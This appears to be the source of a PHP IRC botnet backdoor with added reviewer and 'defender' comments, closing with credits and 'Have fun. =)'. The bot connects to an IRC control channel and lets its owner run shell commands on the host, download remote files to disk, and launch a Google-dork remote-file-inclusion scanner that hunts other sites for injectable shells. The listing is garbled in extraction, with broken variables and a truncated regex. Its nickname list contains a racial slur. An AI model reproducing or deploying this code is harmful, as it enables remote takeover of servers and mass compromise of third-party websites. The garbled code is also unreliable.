<? Php
// Config ///////////////////////////////////// /////////////////////////////
// Operator-supplied settings for the IRC control channel. Every address, channel
// and nickname value is blank in this listing, so the page itself carries no
// server or operator indicators; only the default port (6667) and trigger (".")
// are filled in.
// NOTE(review): spacing and capitalisation were mangled in extraction
// ("<? Php", "$ Network" declared but "$ network" read later); the listing does
// not parse as shown and is reviewed here as a specimen only.
$ Network = ""; // irc network address //
$ Port = 6667; // irc network port //
$ Channel = ""; // irc channel //
$ Channel_password = ""; // irc channel password //
$ Owner = ""; // owners nickname //
$ Owner_password = ""; // login password (MD5 Encoded )//
$ Trigger = "."; // bot trigger //
$ Max_results = 150; // maximum Google results //
// End config //////////////////////////////////// //////////////////////////
// Removes PHP's execution time limit (0 means no limit), with errors suppressed,
// so the script can keep its socket open indefinitely.
// Defender note: a PHP worker that never finishes and holds an outbound
// connection to an IRC port is a strong host-level detection signal.
@ Set_time_limit (0 );
// Builds the nickname the script registers with: one entry of the hard-coded
// list followed by a number from 1000 to 9999. The loop runs twice but assigns
// rather than appends, so only the second pick is returned.
// Defender note: nicks of the form <list entry><4 digits> are a network-level
// indicator for this script.
Function randName (){
$ Nickparts = Array ("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee ", "sm4ck", "nigr", "sTench ");
$ Tmp = "";
For ($ I = 0; $ I <2; $ I ++ ){
$ Tmp = $ nickparts [mt_rand (0, count ($ nickparts)-1)]. mt_rand (1000,9999 );
}
Return $ tmp;
}
// Opens the outbound TCP connection to the configured IRC server; on failure the
// script stops with "Connection error:" followed by the socket error text.
// Defender note: web application hosts rarely need outbound IRC, so egress
// filtering that denies it by default stops the script at this line.
$ Sck = fsockopen ($ network, $ port, $ errno, $ errstr) or die ("Connection error:". $ errstr );
// Writes a PRIVMSG line carrying $msg to the open IRC socket.
// The second parameter's name was lost in extraction ("$ "); the body reads it
// as $to, the message target. The global $nick is declared but not used here.
Function send ($ msg, $ ){
Global $ sck, $ nick;
Fputs ($ sck, "PRIVMSG". $ to. "". $ msg ."");
}
// Reads one line (up to 1024 bytes) from the socket, with read errors
// suppressed, and answers a server PING with a PONG carrying the second token.
// Called from scan() so the connection survives long scans.
// NOTE(review): the condition is printed with a single "=" and explode() with an
// empty delimiter; both look like extraction damage, so treat the exact test as
// unreliable in this listing.
Function pong (){
Global $ sck;
$ Dat = @ fgets ($ sck, 1024 );
$ D = explode ("", $ dat );
If ($ d [0] = "PING "){
Fputs ($ sck, "PONG". $ d [1]);
}
$ Dat = "";
}
// Returns the name of the first of popen, exec and shell_exec that does not
// appear in PHP's disable_functions setting; when all three are listed the
// function falls through without returning a value.
// Defender note: this lookup is the only gate in front of command execution in
// this script. A php.ini whose disable_functions covers every process-execution
// function, not only these three, closes that path on the host.
Function get_exec_function (){
$ Exec_functions = array ("popen", "exec", "shell_exec ");
$ Disabled_funcs = ini_get (disable_functions );
Foreach ($ exec_functions as $ f) if (strpos ($ disabled_funcs, $ f) === false) return $ f;
}
// Runs $command through the PHP function named by $exec_function and relays the
// output to the IRC target through send(). When no function name is supplied it
// reports "No execution functions..." and then reaches the switch, where no case
// matches. The third parameter's name was lost in extraction ("$ "); the body
// reads it as $to.
// Defender note: $command is chat text from the control channel passed through
// unchanged. On the host this appears as the web-server account spawning shell
// or command children, which process-creation auditing will record.
Function execute_command ($ exec_function, $ command, $ ){
If (! $ Exec_function ){
Send ("No execution functions...", $ );
}
Switch ($ exec_function ){
Case "popen": $ h = popen ($ command, "r"); while (! Feof ($ h) send (fgets ($ h), $ to); break;
Case "exec": exec ($ command, $ result); foreach ($ result as $ r) send ($ r, $ to); break;
Case "shell_exec": send (shell_exec ($ command), $ to); break;
}
}
// Fetches $url with file_get_contents() and writes the body to the local path
// $out, reporting each outcome ("Unable to write file", "Unable to open remote
// file", "Unable to save file", "File saved") over IRC. The third parameter's
// name was lost in extraction ("$ ").
// Defender note: this is the script's file-drop step. allow_url_fopen=Off makes
// the remote read fail, and a web root the PHP account cannot write to makes the
// fopen() fail; file-integrity monitoring on web directories catches what lands.
Function get ($ url, $ out, $ ){
If (! $ O = fopen ($ out, "w "))
Send ("Unable to write file", $ );
Else {
If (! $ C = file_get_contents ($ url ))
Send ("Unable to open remote file", $ );
Else {
If (! Fwrite ($ o, $ c ))
Send ("Unable to save file", $ );
Else {
Send ("File saved", $ );
Fclose ($ o );
}
}
}
}
// Rewrites every byte of $s as a decimal HTML character reference (the byte's
// hex form converted back to decimal, wrapped in "&#" and ";") and URL-encodes
// the result for use as a search query parameter.
// NOTE(review): presumably done so the query text does not appear literally in
// the request; the page does not say. Log or proxy rules that match on literal
// query strings should account for this encoding.
Function encodeDork ($ s ){
$ Tmp = "";
For ($ I = 0; $ I <strlen ($ s); $ I ++ ){
$ Tmp. = "& #". hexdec (bin2hex ($ s [$ I]). ";";
}
Return urlencode ($ tmp );
}
// Probes one host for remote file inclusion. Takes the host part of $url (the
// third "/"-separated field), prefixes the scheme (adding "www." when the host
// lacks it), appends $bug and $shell, and fetches the result with cURL: body
// returned, headers omitted, 4-second timeout. Returns the probed URL when the
// response body contains $search, otherwise false.
// Defender note: on the receiving site this appears as a GET whose parameter
// value is itself a URL. allow_url_include=Off (PHP's default) and never passing
// request data to include/require remove the condition this probe tests for.
Function shellInject ($ url, $ bug, $ shell, $ search ){
$ Url = explode ("/", $ url );
$ Url = $ url [2];
$ Url = (strpos ($ url, "www ")! = False? "Http: //". $ url: "http: // www.". $ url). $ bug. $ shell ."?? ";
$ Ch = curl_init ($ url );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 4 );
$ Ret = curl_exec ($ ch );
$ Httpcode = curl_getinfo ($ ch, CURLINFO_HTTP_CODE );
Curl_close ($ ch );
If ($ httpcode = 200 ){
If (strpos ($ ret, $ search )! = False ){
Return $ url;
}
}
Return false;
}
// Drives the search-and-probe loop. Queries Google for the encoded $dork, reads
// the reported result count, caps it at the global $max_results, then pages
// through the results and hands each link to shellInject(). Hits are announced
// as "[+] Shell found:", a page with no links as "No sites found", and progress
// as "<n> scanned"; pong() is called after every page to answer keep-alives.
// Sends "cURL is not enabled" when curl_init is unavailable. The last
// parameter's name was lost in extraction ("$ ").
// NOTE(review): the link-extraction call inside the while loop is truncated in
// this listing (the pattern ends right after its opening "/"), so the code that
// fills $links is not visible here.
// Defender note: from the compromised host this is a burst of requests to a
// search engine followed by short-timeout GETs to many unrelated sites; outbound
// proxy or firewall logs show the pattern clearly.
Function scan ($ dork, $ bug, $ shell, $ search, $ ){
Global $ max_results;
If (function_exists (curl_init )){
$ Ch = curl_init ("http://www.google.com/search? Q = ". encodeDork ($ dork)." & start = 0 ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
$ Ret = curl_exec ($ ch );
Curl_close ($ ch );
Preg_match_all ("/of (about) * <B> ([d,] +) </B>/", $ ret, $ max );
$ Max = str_replace (",", "", $ max [2] [0]);
$ Max = $ max> $ max_results? $ Max_results: $ max;
$ I = 0;
While ($ I <$ max ){
$ Ch = curl_init ("http://www.google.com/search? Q = ". encodeDork ($ dork)." & start = ". $ I );
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_HEADER, 0 );
$ Ret = curl_exec ($ ch );
Preg_match_all ("/
If (@ $ links [1]) {
Foreach ($ links [1] as $ l ){
$ Ret = shellInject ($ l, $ bug, $ shell, $ search );
If ($ ret! = False ){
Send ("[+] Shell found:". $ ret, $ );
}
}
}
Else {
Send ("No sites found", $ );
}
Curl_close ($ ch );
$ I = $ max> 10? $ I + = 10: $ I ++;
Send ("$ I scanned", $ );
Pong ();
}
}
Else {
Send ("cURL is not enabled", $ );
}
}
// Session start: pick a random nickname and register with the server using USER
// and NICK, one second apart. The USER line carries a fixed "hotmail.com" text,
// which is a usable traffic indicator.
$ Nick = randName ();
Sleep (1 );
Fputs ($ sck, "USER". $ nick ."? * ". $ Nick." @ hotmail.com ");
Sleep (1 );
Fputs ($ sck, "NICK". $ nick ."");
// Commands are refused until the owner logs in during this session.
$ Loggedin = false;
// Main read loop: one server line (up to 4096 bytes) per pass until the socket
// reports end-of-file.
While (! Feof ($ sck )){
$ Dat = fgets ($ sck, 4096 );
$ D = explode ("", $ dat );
// Pull sender, sender host, target, command word and arguments out of PRIVMSG
// lines whose text starts with the configured trigger.
Preg_match_all ("/:(. + )! (. +) PRIVMSG (. +): $ trigger (w +) s * (. +) */", $ dat, $ cmd );
// Keep-alive: answer PING with PONG.
If ($ d [0] = "PING "){
Fputs ($ sck, "PONG". $ d [1]);
}
// Joins the configured channel, with its password, once a server line
// containing "help register" has been seen.
If (strpos ($ dat, "help register ")! = False ){
Fputs ($ sck, "JOIN". $ channel. "". $ channel_password ."");
}
// Answers a VERSION query with a fixed mIRC v6.3 string, i.e. the script
// presents itself as a desktop chat client.
// Defender note: that fixed reply text is a stable network signature.
If (preg_match ("/:(. + )!. + PRIVMSG. +:. VERSION (.)/", $ dat, $ v )){
Fputs ($ sck, "NOTICE ". $ v [1]. "". $ v [2]. "VERSION mIRC v6.3 haled Mardam-Bey ". $ v [2]. "");
}
// A triggered command was parsed from this line.
If (@ $ cmd [4] [0]) {
$ From = $ cmd [1] [0];
$ From_host = $ cmd [2] [0];
// Reply target: the sender when the message was addressed to the bot's own
// nick, otherwise the original target (the channel).
$ To = $ cmd [3] [0] = $ nick? $ Cmd [1] [0]: $ cmd [3] [0];
$ Command = $ cmd [4] [0];
$ Args = $ cmd [5] [0];
// Commands are dispatched only for the configured owner nick after login.
If ($ from ==$ owner & $ loggedin = true ){
Switch ($ command ){
// cmd: run the argument text as an operating-system command.
Case "cmd": execute_command (get_exec_function (), $ args, $ to); break;
// die: send QUIT and end the script.
Case "die": fputs ($ sck, "QUIT: partitioned Ed die from". $ from); die ();
// get: download a URL (first argument) to a local path (second argument).
Case "get": $ a = explode ("", $ args); get ($ a [0], $ a [1], $ to); break;
// inf: report the HTTP host name and the account the script runs as.
Case "inf": send ("Host:". $ _ SERVER [HTTP_HOST]. "Whoami:". @ exec (whoami), $ to); break;
// raw: write the argument text to the IRC socket as-is.
Case "raw": fputs ($ sck, $ args. ""); break;
// rfi: start a scan; needs four arguments (dork, bug, shell, search).
Case "rfi": $ a = explode ("", $ args );
If (count ($ a)> 3) {send ("Beginning RFI scan", $ to); scan ($ a [0], $ a [1], $ a [2], $ a [3], $ to); send ("RFI scan complete", $ );}
Else send ("Usage: (dork) (bug) (shell) (search)", $ );
Break;
// say: repeat the argument text to the reply target.
Case "say": send ($ args, $ to); break;
Default: send ("Unknown command.", $ );
}
}
// Not logged in yet: the only accepted command is "login", whose argument is
// hashed with md5() and compared with the configured owner password value.
Elseif ($ from ==$ owner & $ loggedin == false ){
If ($ command = "login "){
If (md5 ($ args) ==$ owner_password ){
$ Loggedin = true;
Send ("User $ from successfully logged in.", $ );
}
Else {
Send ("Login failed.", $ );
}
}
}
}
$ Dat = "";
}
?>
Credits flyZ to: Array ("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee ", "sm4ck", "nigr", "sTench ");
Have fun. =)